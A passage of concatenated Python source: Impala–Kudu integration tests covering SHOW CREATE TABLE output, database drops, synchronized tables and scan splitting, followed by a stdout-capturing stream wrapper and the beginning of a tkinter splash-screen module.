      PARTITION BY HASH (c) PARTITIONS 3, RANGE (c) (...)
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
          db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
  # Explicit column encoding is preserved.
  self.assert_show_create_equals(cursor,
      """
      CREATE TABLE {table} (c INT ENCODING PLAIN_ENCODING, PRIMARY KEY (c))
      PARTITION BY HASH (c) PARTITIONS 3 STORED AS KUDU""",
      """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL ENCODING PLAIN_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        PRIMARY KEY (c)
      )
      PARTITION BY HASH (c) PARTITIONS 3
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
          db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
  # Composite key, explicit compression, two hash levels plus a range level.
  self.assert_show_create_equals(cursor,
      """
      CREATE TABLE {table} (c INT COMPRESSION LZ4, d STRING, PRIMARY KEY(c, d))
      PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3,
      RANGE (c, d) (PARTITION VALUE = (1, 'aaa'), PARTITION VALUE = (2, 'bbb'))
      STORED AS KUDU""",
      """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION LZ4,
        d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        PRIMARY KEY (c, d)
      )
      PARTITION BY HASH (c) PARTITIONS 3, HASH (d) PARTITIONS 3, RANGE (c, d) (...)
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
          db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
  # Nullable column with a DEFAULT value.
  self.assert_show_create_equals(cursor,
      """
      CREATE TABLE {table} (c INT, d STRING, e INT NULL DEFAULT 10, PRIMARY KEY(c, d))
      PARTITION BY RANGE (c) (PARTITION VALUES <= 1, PARTITION 1 < VALUES <= 2,
      PARTITION 2 < VALUES <= 3, PARTITION 3 < VALUES) STORED AS KUDU""",
      """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        d STRING NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        e INT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT 10,
        PRIMARY KEY (c, d)
      )
      PARTITION BY RANGE (c) (...)
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
          db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
  # No PARTITION BY clause at all.
  self.assert_show_create_equals(cursor,
      """
      CREATE TABLE {table} (c INT PRIMARY KEY) STORED AS KUDU""",
      """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        PRIMARY KEY (c)
      )
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
          db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
  # Column comment; the storage attributes precede the comment in the output.
  self.assert_show_create_equals(cursor,
      """
      CREATE TABLE {table} (c INT COMMENT 'Ab 1@' PRIMARY KEY) STORED AS KUDU""",
      """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL {p} COMMENT 'Ab 1@',
        PRIMARY KEY (c)
      )
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
          db=cursor.conn.db_name, p=self.column_properties,
          kudu_addr=KUDU_MASTER_HOSTS))
@SkipIfKudu.hms_integration_enabled
def test_timestamp_default_value(self, cursor):
  """Checks SHOW CREATE TABLE output for a TIMESTAMP column with a DEFAULT value:
  the default is rendered as unix_micros_to_utc_timestamp() and, per the three
  cases below, sub-microsecond precision is rounded to the nearest microsecond."""
  create_sql_fmt = """
      CREATE TABLE {table} (c INT, d TIMESTAMP,
      e TIMESTAMP NULL DEFAULT CAST('%s' AS TIMESTAMP),
      PRIMARY KEY(c, d))
      PARTITION BY HASH(c) PARTITIONS 3
      STORED AS KUDU"""
  # Long lines are unfortunate, but extra newlines will break the test.
  show_create_sql_fmt = """
      CREATE TABLE {db}.{{table}} (
        c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        d TIMESTAMP NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
        e TIMESTAMP NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION DEFAULT unix_micros_to_utc_timestamp(%s),
        PRIMARY KEY (c, d)
      )
      PARTITION BY HASH (c) PARTITIONS 3
      STORED AS KUDU
      TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
      db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS)
  # Exact microsecond value.
  self.assert_show_create_equals(cursor,
      create_sql_fmt % ("2009-01-01 00:00:00.000001000"),
      show_create_sql_fmt % ("1230768000000001"))
  # 1001 ns rounds down to 1 us.
  self.assert_show_create_equals(cursor,
      create_sql_fmt % ("2009-01-01 00:00:00.000001001"),
      show_create_sql_fmt % ("1230768000000001"))
  # 999 ns rounds up to 1 us.
  self.assert_show_create_equals(cursor,
      create_sql_fmt % ("2009-01-01 00:00:00.000000999"),
      show_create_sql_fmt % ("1230768000000001"))
@SkipIfKudu.hms_integration_enabled
def test_external_kudu_table_name_with_show_create(self, cursor, kudu_client,
    unique_database):
  """Check that the generated kudu.table_name tblproperty is present with
  show create table with external Kudu tables.
  """
  # Create the underlying table directly in Kudu so the Impala table is external.
  schema_builder = SchemaBuilder()
  column_spec = schema_builder.add_column("id", INT64)
  column_spec.nullable(False)
  schema_builder.set_primary_keys(["id"])
  partitioning = Partitioning().set_range_partition_columns(["id"])
  schema = schema_builder.build()
  kudu_table_name = self.random_table_name()
  try:
    kudu_client.create_table(kudu_table_name, schema, partitioning)
    kudu_table = kudu_client.table(kudu_table_name)
    table_name_prop = "'kudu.table_name'='%s'" % kudu_table.name
    # do_exact_match=True: compare SHOW CREATE output verbatim, including the
    # kudu.table_name property.
    self.assert_show_create_equals(cursor,
        """
        CREATE EXTERNAL TABLE {{table}} STORED AS KUDU
        TBLPROPERTIES({props})""".format(
            props=table_name_prop),
        """
        CREATE EXTERNAL TABLE {db}.{{table}}
        STORED AS KUDU
        TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}', {kudu_table})""".format(
            db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS,
            kudu_table=table_name_prop), True)
  finally:
    if kudu_client.table_exists(kudu_table_name):
      kudu_client.delete_table(kudu_table_name)
@SkipIfKudu.hms_integration_enabled
def test_managed_kudu_table_name_with_show_create(self, cursor):
    """Check that the generated kudu.table_name tblproperty is not present with
    show create table with managed Kudu tables.
    """
    # Unlike the external-table case above, only kudu.master_addresses may
    # appear in TBLPROPERTIES for a managed table.
    self.assert_show_create_equals(cursor,
        """
CREATE TABLE {table} (c INT PRIMARY KEY)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU""",
        """
CREATE TABLE {db}.{{table}} (
c INT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (c)
)
PARTITION BY HASH (c) PARTITIONS 3
STORED AS KUDU
TBLPROPERTIES ('kudu.master_addresses'='{kudu_addr}')""".format(
            db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS))
def test_synchronized_kudu_table_with_show_create(self, cursor):
    """SHOW CREATE TABLE output for synchronized tables (EXTERNAL with
    external.table.purge=true) must match the expected canonical form."""
    # in this case we do exact match with the provided input since this is specifically
    # creating a synchronized table
    self.assert_show_create_equals(cursor,
        """
CREATE EXTERNAL TABLE {table} (
id BIGINT,
name STRING,
PRIMARY KEY(id))
PARTITION BY HASH PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES('external.table.purge'='true')""",
        """
CREATE EXTERNAL TABLE {db}.{{table}} (
id BIGINT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
name STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (id)
)
PARTITION BY HASH (id) PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true', 'kudu.master_addresses'='{kudu_addr}')"""
        .format(db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS), True)
    # Same check with the primary key declared inline on the column.
    self.assert_show_create_equals(cursor,
        """
CREATE EXTERNAL TABLE {table} (
id BIGINT PRIMARY KEY,
name STRING)
PARTITION BY HASH(id) PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES('external.table.purge'='true')""",
        """
CREATE EXTERNAL TABLE {db}.{{table}} (
id BIGINT NOT NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
name STRING NULL ENCODING AUTO_ENCODING COMPRESSION DEFAULT_COMPRESSION,
PRIMARY KEY (id)
)
PARTITION BY HASH (id) PARTITIONS 16
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true', 'kudu.master_addresses'='{kudu_addr}')"""
        .format(db=cursor.conn.db_name, kudu_addr=KUDU_MASTER_HOSTS), True)
class TestDropDb(KuduTestSuite):
    """DROP DATABASE behaviour when the database contains Kudu-backed tables."""

    @SkipIfKudu.hms_integration_enabled
    def test_drop_non_empty_db(self, unique_cursor, kudu_client):
        """Check that an attempt to drop a database will fail if Kudu tables are present
        and that the tables remain.
        """
        db_name = unique_cursor.conn.db_name
        with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
            impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
            props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
            unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
                impala_table_name, props))
            # Leave the database before trying to drop it.
            unique_cursor.execute("USE DEFAULT")
            try:
                unique_cursor.execute("DROP DATABASE %s" % db_name)
                assert False
            except Exception as e:
                assert "One or more tables exist" in str(e)
            # The external table must still be fully queryable after the failed drop.
            unique_cursor.execute("SELECT COUNT(*) FROM %s.%s" % (db_name, impala_table_name))
            assert unique_cursor.fetchall() == [(0, )]

    @SkipIfKudu.hms_integration_enabled
    def test_drop_db_cascade(self, unique_cursor, kudu_client):
        """Check that an attempt to drop a database will succeed even if Kudu tables are
        present and that the managed tables are removed.
        """
        db_name = unique_cursor.conn.db_name
        with self.temp_kudu_table(kudu_client, [INT32], db_name=db_name) as kudu_table:
            # Create an external Kudu table
            impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
            props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
            unique_cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
                impala_table_name, props))
            # Create a managed Kudu table
            managed_table_name = self.random_table_name()
            unique_cursor.execute("""
CREATE TABLE %s (a INT PRIMARY KEY) PARTITION BY HASH (a) PARTITIONS 3
STORED AS KUDU""" % managed_table_name)
            kudu_table_name = "impala::" + db_name + "." + managed_table_name
            assert kudu_client.table_exists(kudu_table_name)
            # Create a table in HDFS
            hdfs_table_name = self.random_table_name()
            unique_cursor.execute("""
CREATE TABLE %s (a INT) PARTITIONED BY (x INT)""" % (hdfs_table_name))
            unique_cursor.execute("USE DEFAULT")
            unique_cursor.execute("DROP DATABASE %s CASCADE" % db_name)
            # Database is gone. Data of the *external* table survives in Kudu,
            # while the managed table's backing Kudu table is deleted with it.
            unique_cursor.execute("SHOW DATABASES")
            assert (db_name, '') not in unique_cursor.fetchall()
            assert kudu_client.table_exists(kudu_table.name)
            assert not kudu_client.table_exists(managed_table_name)
class TestImpalaKuduIntegration(KuduTestSuite):
    """Scenarios where the underlying Kudu table is manipulated directly through
    the Kudu client, behind Impala's back."""

    @SkipIfKudu.hms_integration_enabled
    def test_replace_kudu_table(self, cursor, kudu_client):
        """Check that an external Kudu table is accessible if the underlying Kudu table is
        modified using the Kudu client.
        """
        # Create an external Kudu table
        col_names = ['a']
        with self.temp_kudu_table(kudu_client, [INT32], col_names=col_names) as kudu_table:
            impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
            props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
            cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
                impala_table_name, props))
            cursor.execute("DESCRIBE %s" % (impala_table_name))
            # Row layout: (name, type, comment, primary_key, nullable, default,
            # encoding, compression, block_size).
            assert cursor.fetchall() == \
                [("a", "int", "", "true", "false", "", "AUTO_ENCODING",
                  "DEFAULT_COMPRESSION", "0")]
            # Drop the underlying Kudu table and replace it with another Kudu table that has
            # the same name but different schema
            kudu_client.delete_table(kudu_table.name)
            assert not kudu_client.table_exists(kudu_table.name)
            new_col_names = ['b', 'c']
            name_parts = kudu_table.name.split(".")
            assert len(name_parts) == 2
            with self.temp_kudu_table(kudu_client, [STRING, STRING], col_names=new_col_names,
                                      db_name=name_parts[0], name= name_parts[1]) as new_kudu_table:
                assert kudu_client.table_exists(new_kudu_table.name)
                # Refresh the external table and verify that the new schema is loaded from
                # Kudu.
                cursor.execute("REFRESH %s" % (impala_table_name))
                cursor.execute("DESCRIBE %s" % (impala_table_name))
                assert cursor.fetchall() == \
                    [("b", "string", "", "true", "false", "", "AUTO_ENCODING",
                      "DEFAULT_COMPRESSION", "0"),
                     ("c", "string", "", "false", "true", "", "AUTO_ENCODING",
                      "DEFAULT_COMPRESSION", "0")]

    @SkipIfKudu.hms_integration_enabled
    def test_delete_external_kudu_table(self, cursor, kudu_client):
        """Check that Impala can recover from the case where the underlying Kudu table of
        an external table is dropped using the Kudu client.
        """
        with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
            # Create an external Kudu table
            impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
            props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
            cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
                impala_table_name, props))
            cursor.execute("DESCRIBE %s" % (impala_table_name))
            assert cursor.fetchall() == \
                [("a", "int", "", "true", "false", "", "AUTO_ENCODING",
                  "DEFAULT_COMPRESSION", "0")]
            # Drop the underlying Kudu table
            kudu_client.delete_table(kudu_table.name)
            assert not kudu_client.table_exists(kudu_table.name)
            err_msg = 'the table does not exist: table_name: "%s"' % (kudu_table.name)
            try:
                cursor.execute("REFRESH %s" % (impala_table_name))
            except Exception as e:
                assert err_msg in str(e)
            # DROP TABLE must still succeed even though the backing table is gone.
            cursor.execute("DROP TABLE %s" % (impala_table_name))
            cursor.execute("SHOW TABLES")
            assert (impala_table_name,) not in cursor.fetchall()

    @SkipIfKudu.hms_integration_enabled
    def test_delete_managed_kudu_table(self, cursor, kudu_client, unique_database):
        """Check that dropping a managed Kudu table works even if the underlying Kudu table
        has been dropped externally."""
        impala_tbl_name = "foo"
        cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name))
        kudu_tbl_name = KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name)
        assert kudu_client.table_exists(kudu_tbl_name)
        kudu_client.delete_table(kudu_tbl_name)
        assert not kudu_client.table_exists(kudu_tbl_name)
        cursor.execute("DROP TABLE %s.%s" % (unique_database, impala_tbl_name))
        cursor.execute("SHOW TABLES IN %s" % unique_database)
        assert (impala_tbl_name,) not in cursor.fetchall()
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
class TestKuduMemLimits(KuduTestSuite):
    """Runs a fixed set of Kudu scan queries under several mem_limit settings and
    verifies each either succeeds or fails cleanly with "Memory limit exceeded"."""

    QUERIES = ["select * from tpch_kudu.lineitem where l_orderkey = -1",
               "select * from tpch_kudu.lineitem where l_commitdate like '%cheese'",
               "select * from tpch_kudu.lineitem limit 90"]

    # The value indicates the minimum memory requirements for the queries above, the first
    # memory limit corresponds to the first query
    QUERY_MEM_LIMITS = [1, 1, 10]

    @pytest.mark.execute_serially
    @pytest.mark.parametrize("mem_limit", [1, 10, 0])
    def test_low_mem_limit_low_selectivity_scan(self, cursor, mem_limit, vector):
        """Tests that the queries specified in this test suite run under the given
        memory limits."""
        # Fix: dict.iteritems() was removed in Python 3; items() behaves
        # equivalently here on both Python 2 and 3.
        exec_options = dict((k, str(v)) for k, v
                            in vector.get_value('exec_option').items())
        exec_options['mem_limit'] = "{0}m".format(mem_limit)
        # IMPALA-9856: We disable query result spooling so that this test can run queries
        # with low mem_limit.
        exec_options['spool_query_results'] = "0"
        for i, q in enumerate(self.QUERIES):
            try:
                cursor.execute(q, configuration=exec_options)
                cursor.fetchall()
            except Exception as e:
                # Failures are only acceptable when we ran below the query's
                # known minimum memory requirement.
                if (mem_limit > self.QUERY_MEM_LIMITS[i]):
                    raise
                assert "Memory limit exceeded" in str(e)

        # IMPALA-4654: Validate the fix for a bug where LimitReached() wasn't respected in
        # the KuduScanner and the limit query above would result in a fragment running an
        # additional minute. This ensures that the num fragments 'in flight' reaches 0 in
        # less time than IMPALA-4654 was reproducing (~60sec) but yet still enough time that
        # this test won't be flaky.
        verifiers = [MetricVerifier(i.service)
                     for i in ImpalaCluster.get_e2e_test_cluster().impalads]
        for v in verifiers:
            v.wait_for_metric("impala-server.num-fragments-in-flight", 0, timeout=30)
@SkipIfHive2.create_external_kudu_table
class TestCreateSynchronizedTable(KuduTestSuite):
    """Covers "synchronized" Kudu tables: EXTERNAL tables created with
    external.table.purge=true, whose DDL is mirrored into Kudu like a managed
    table while staying EXTERNAL from HMS's point of view."""

    def test_create_synchronized_table(self, cursor, kudu_client, unique_database):
        """
        Creates a synchronized Kudu table and makes sure that the statement does not fail.
        """
        table_name = self.random_table_name()
        # create a external kudu table with external.table.purge=true
        cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
id int PRIMARY KEY,
name string)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true')
""" % (unique_database, table_name))
        # make sure that the table was created
        cursor.execute("SHOW TABLES IN %s" % unique_database)
        assert (table_name,) in cursor.fetchall()
        # make sure that the kudu table was created with default name
        assert kudu_client.table_exists(self.to_kudu_table_name(unique_database, table_name))
        # make sure that the external.table.purge property can be changed
        cursor.execute("ALTER TABLE %s.%s set TBLPROPERTIES ("
                       "'external.table.purge'='FALSE')" % (unique_database, table_name))
        cursor.execute("SHOW TABLES IN %s" % unique_database)
        assert (table_name,) in cursor.fetchall()
        cursor.execute("ALTER TABLE %s.%s set TBLPROPERTIES ("
                       "'external.table.purge'='TRUE')" % (unique_database, table_name))
        cursor.execute("SHOW TABLES IN %s" % unique_database)
        assert (table_name,) in cursor.fetchall()
        # make sure that table can be renamed
        new_table_name = self.random_table_name()
        cursor.execute("ALTER TABLE %s.%s rename to %s.%s" %
                       (unique_database, table_name, unique_database, new_table_name))
        cursor.execute("SHOW TABLES IN %s" % unique_database)
        assert (new_table_name,) in cursor.fetchall()
        # make sure that the kudu table was created with default name
        assert kudu_client.table_exists(
            self.to_kudu_table_name(unique_database, new_table_name))
        # now make sure that table disappears after we remove it; dropping a
        # synchronized table must also purge the backing Kudu table.
        cursor.execute("DROP TABLE %s.%s" % (unique_database, new_table_name))
        cursor.execute("SHOW TABLES IN %s" % unique_database)
        assert (new_table_name,) not in cursor.fetchall()
        assert not kudu_client.table_exists(
            self.to_kudu_table_name(unique_database, new_table_name))

    def test_invalid_sync_table_stmts(self, cursor, kudu_client, unique_database):
        """
        Test makes sure that an invalid way to create a synchronized table is erroring out
        """
        table_name = self.random_table_name()
        # EXTERNAL + explicit purge=false is rejected.
        try:
            cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='false')
""" % (unique_database, table_name))
            assert False,\
                "Create table statement with external.table.purge=False should error out"
        except Exception as e:
            # We throw this exception since the analyzer checks for properties one by one.
            # This is the first property that it checks for an external table
            assert "Table property kudu.table_name must be specified when " \
                   "creating an external Kudu table" in str(e)
        try:
            # missing external.table.purge in TBLPROPERTIES
            cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('FOO'='BAR')
""" % (unique_database, table_name))
            assert False, \
                "Create external table statement must include external.table.purge property"
        except Exception as e:
            # We throw this exception since the analyzer checks for properties one by one.
            # This is the first property that it checks for an external table
            assert "Table property kudu.table_name must be specified when " \
                   "creating an external Kudu table" in str(e)
        try:
            # Trying to create a managed table with external.purge.table property in it
            cursor.execute("""
CREATE TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='true')
""" % (unique_database, table_name))
            assert False, \
                "Managed table creation with external.table.purge property must be disallowed"
        except Exception as e:
            assert "Table property 'external.table.purge' cannot be set to true " \
                   "with an managed Kudu table." in str(e)
        # TODO should we block this?
        # A managed table with purge='False' is currently accepted.
        cursor.execute("""
CREATE TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES ('external.table.purge'='False')""" % (unique_database, table_name))
        cursor.execute("SHOW TABLES IN %s" % unique_database)
        assert (table_name,) in cursor.fetchall()

    def test_sync_tbl_with_kudu_table(self, cursor, kudu_client, unique_database):
        """
        Test tries to create a synchronized table with an existing Kudu table name and
        makes sure it fails.
        """
        with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
            table_name = self.random_table_name()
            try:
                cursor.execute("""
CREATE EXTERNAL TABLE %s.%s (
a int PRIMARY KEY)
PARTITION BY HASH PARTITIONS 8
STORED AS KUDU
TBLPROPERTIES('external.table.purge'='true', 'kudu.table_name' = '%s')"""
                    % (unique_database, table_name,
                       self.get_kudu_table_base_name(kudu_table.name)))
                assert False, "External tables with external.purge.table property must fail " \
                              "if the kudu table already exists"
            except Exception as e:
                assert "Not allowed to set 'kudu.table_name' manually for" \
                       " synchronized Kudu tables" in str(e)
class TestKuduReadTokenSplit(KuduTestSuite):
    """
    This suite verifies impala's integration of Kudu's split token API.
    """

    @classmethod
    def add_test_dimensions(cls):
        super(TestKuduReadTokenSplit, cls).add_test_dimensions()
        # The default read mode of READ_LATEST does not provide high enough consistency for
        # these tests.
        add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")

    @SkipIfKudu.no_hybrid_clock
    @SkipIfNotHdfsMinicluster.tuned_for_minicluster
    def test_kudu_scanner(self, vector, unique_database):
        """This runs explain query with variations of mt_dop and
        targeted_kudu_scan_range_length to verify targeted_kudu_scan_range_length's
        functionality.
        Test disabled for EC since the erasure coded files when loaded in kudu
        during data load cause the expected behaviour to change"""
        explain_query = "explain select * from tpch_kudu.lineitem "
        plans = []
        regular_num_inst = self.__get_num_scanner_instances(explain_query, mt_dop=None,
            targeted_kudu_scan_range_length=None, plans=plans)
        mt_dop_1_num_inst = self.__get_num_scanner_instances(explain_query, mt_dop=1,
            targeted_kudu_scan_range_length=None, plans=plans)
        # targeted_kudu_scan_range_length should be disabled by default and num instances
        # will be equal to the number of partitions
        with_mt_dop_num_inst = self.__get_num_scanner_instances(explain_query, mt_dop=10,
            targeted_kudu_scan_range_length=None, plans=plans)
        # This will result in more splits
        with_mt_dop_and_low_range_len_num_inst = self.__get_num_scanner_instances(
            explain_query, mt_dop=10, targeted_kudu_scan_range_length="8mb", plans=plans)
        # Scanner instance counts must increase strictly as parallelism is turned up.
        assert mt_dop_1_num_inst == regular_num_inst, str(plans)
        assert regular_num_inst < with_mt_dop_num_inst, str(plans)
        assert with_mt_dop_num_inst < with_mt_dop_and_low_range_len_num_inst, str(plans)

    def __get_num_scanner_instances(self, explain_query, mt_dop,
                                    targeted_kudu_scan_range_length, plans):
        """This is a helper method that runs the explain query with the provided query
        options (mt_dop and targeted_kudu_scan_range_length). Appends the generated plan to
        'plans' and returns the num of kudu scanner instances """
        # F00 is the scan fragment; its instance count reflects the split tokens.
        regex = r'F00:PLAN FRAGMENT \[RANDOM\] hosts=3 instances=([0-9]+)'
        self.client.set_configuration_option("explain_level", 3)
        if targeted_kudu_scan_range_length:
            self.client.set_configuration_option("targeted_kudu_scan_range_length",
                                                 targeted_kudu_scan_range_length)
        if mt_dop:
            self.client.set_configuration_option("mt_dop", mt_dop)
        result = self.client.execute(explain_query)
        plan = "\n".join(result.data)
        plans.append(plan)
        matches = re.search(regex, plan)
        assert len(matches.groups()) == 1, plan
        # Reset options so the next call starts from a clean slate.
        self.client.clear_configuration()
        return int(matches.group(1))
|
stream.py | import queue
import sys
import threading
import time
_global_streams = {"stdout": None, "stderr": None}
DEBOUNCE_SECONDS = 3
class StreamBase(object):
    """Common machinery for redirecting one of the process's standard streams.

    ``src`` names the stream ("stdout" or "stderr"); ``callbacks`` is a list of
    callables that subclasses invoke with captured output. A module-level
    registry (``_global_streams``) guarantees at most one active redirect per
    stream.
    """

    def __init__(self, src, callbacks=None):
        assert hasattr(sys, src)
        self.src = src
        self.callbacks = callbacks if callbacks else []

    @property
    def src_stream(self):
        """The interpreter's pristine stream (sys.__stdout__ / sys.__stderr__)."""
        return getattr(sys, "__%s__" % self.src)

    @property
    def src_fd(self):
        """OS file descriptor of the pristine stream."""
        return self.src_stream.fileno()

    @property
    def original_stream(self):
        """Whatever object currently sits at sys.<src> (possibly already patched)."""
        return getattr(sys, self.src)

    def install(self):
        """Register this redirect globally, displacing any other active one."""
        active = _global_streams.get(self.src)
        if active and active != self:
            active.uninstall()
        _global_streams[self.src] = self

    def uninstall(self):
        """Deregister this redirect, but only if it is still the active one."""
        if _global_streams[self.src] == self:
            _global_streams[self.src] = None
class StreamWrapper(StreamBase):
    """
    Patches the write method of current sys.stdout/sys.stderr
    """

    def __init__(self, src, callbacks=()):
        super(StreamWrapper, self).__init__(src=src, callbacks=callbacks)
        self._installed = False   # True while write() is monkeypatched in
        self._queue = None        # captured chunks; created on install()
        self._stopped = None      # event telling the flusher thread to exit
        self._old_write = None    # original stream.write, restored on uninstall()

    def _read_queue(self):
        """Drain and return everything currently queued."""
        data = []
        # TODO: Need lock?
        while not self._queue.empty():
            data.append(self._queue.get())
        return data

    def _flush(self, _data=None):
        """Deliver queued chunks (plus optional extra _data) to every callback.

        Callback errors are swallowed so one bad consumer cannot break capture.
        """
        data = self._read_queue()
        if _data:
            data.extend(_data)
        for cb in self.callbacks:
            try:
                cb(data)
            except Exception:
                # TODO: reraise?
                pass

    def _thread_body(self):
        # Flush periodically; exit only once stop is requested AND the queue
        # has been fully drained.
        while not (self._stopped.is_set() and self._queue.empty()):
            self._flush()
            time.sleep(DEBOUNCE_SECONDS)

    def install(self):
        """Monkeypatch stream.write to tee into our queue and start the flusher."""
        super(StreamWrapper, self).install()
        if self._installed:
            return
        stream = self.original_stream
        self._old_write = stream.write

        def write(data):
            self._old_write(data)   # data still reaches the real stream
            self._queue.put(data)   # and is captured for the callbacks

        # NOTE(review): write is patched before _queue is assigned below; a
        # write from another thread in that window would hit None -- confirm
        # install() is only ever called with no concurrent writers.
        stream.write = write
        self._queue = queue.Queue()
        self._stopped = threading.Event()
        # # TODO: check experiment initiated? settings online?
        self._thread = threading.Thread(target=self._thread_body)
        self._thread.name = "ConsoleStreamThread"
        self._thread.daemon = True
        self._thread.start()
        self._installed = True

    def uninstall(self):
        """Restore the original write, signal the flusher, and flush once more."""
        if not self._installed:
            return
        self.original_stream.write = self._old_write
        self._stopped.set()
        # if self._thread.is_alive():
        #     self._thread.join()
        self._flush()
        self._installed = False
        super(StreamWrapper, self).uninstall()
if __name__ == "__main__":
    # Smoke test: tee stdout into test_log.txt through a StreamWrapper callback.
    # Fixes vs original: 'with' instead of manual close, a named function
    # instead of a lambda bound to a name (PEP 8 E731), and the wrapper is
    # uninstalled afterwards so sys.stdout is restored.
    with open("test_log.txt", "wb") as f:

        def write(data):
            # Callback receives a list of captured chunks; join and persist.
            f.write("".join(data).encode("utf-8"))

        s = StreamWrapper("stdout", [write])
        s.install()
        try:
            for i in range(100):
                print(i)
                if i % 10 == 0:
                    s._flush()
        finally:
            s.uninstall()
|
splash.py | import os
import tkinter
import time
import threading
import builtins
import sys
from PIL import ImageTk, Image
sys._stderr = sys.stderr
sys._stdout = sys.stdout
def disable_print():
    """Silence stdout/stderr by pointing both at the null device.

    Fix: the original assigned the *path string* ``os.devnull`` to sys.stdout,
    so the next print() raised AttributeError (str has no .write). An open
    file object is required; enable_print() restores the saved streams.
    """
    devnull = open(os.devnull, "w")
    sys.stdout = devnull
    sys.stderr = devnull
def enable_print():
    """Undo disable_print() by restoring the streams stashed on the sys module
    at import time (sys._stdout / sys._stderr)."""
    sys.stderr = sys._stderr
    sys.stdout = sys._stdout
def splash():
    """Show a borderless, centered, always-on-top splash image until the editor
    sets the PYUNITY_EDITOR_LOADED environment variable to "1"."""
    root = tkinter.Tk()
    root.overrideredirect(1)              # no title bar / window decorations
    root.attributes("-topmost", True)
    screen_width = root.winfo_screenwidth()
    screen_height = root.winfo_screenheight()
    # Square window, half the screen height, centered on screen.
    size = int(screen_height // 2)
    x = int((screen_width / 2) - (size / 2))
    y = int((screen_height / 2) - (size / 2))
    root.geometry(str(size) + "x" + str(size) + "+" + str(x) + "+" + str(y))
    canvas = tkinter.Canvas(root, width=size, height=size,
